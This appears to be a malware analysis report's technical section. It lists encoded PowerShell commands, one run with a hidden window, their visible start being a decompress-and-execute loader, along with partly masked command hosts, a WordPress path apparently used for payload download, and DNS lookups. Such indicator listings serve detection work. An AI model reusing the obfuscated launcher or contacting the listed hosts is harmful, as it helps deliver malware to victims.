Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABOAEUAVwAtAG8AQgBqAGUAYwB0ACAAaQBPAC4AUwBUAFIAZQBhAG0AUgBlAEEARABlAFIAKAAgACgATgBFAFcALQBvAEIAagBlAGMAdAAgAEkATwAuAGMATwBNAHAAcgBFAHMAcwBpAE8AbgAuAEQARQBGAEwAYQBUAGUAcwB0AHIARQBBAG0AKABbAE...
- 'wo#####ss.erisliner.com':80
- http://dc###alho.net/wp-admin/PPk5Y/
- DNS ASK ho###mebel.com
- DNS ASK la####ewsplus.com
- DNS ASK se#####plikasiasia.com
- DNS ASK dc###alho.net
- DNS ASK wo#####ss.erisliner.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABOAEUAVwAtAG8AQgBqAGUAYwB0ACAAaQBPAC4AUwBUAFIAZQBhAG0AUgBlAEEARABlAFIAKAAgACgATgBFAFcALQBvAEIAagBlAGMAdAAgAEkATwAuAGMATwBNAHAAcgBFAHMAcwBpAE8AbgAuAEQARQBGAEwAYQBUAGUAcwB0AHIARQBBAG0AKABbAE...' (with hidden window)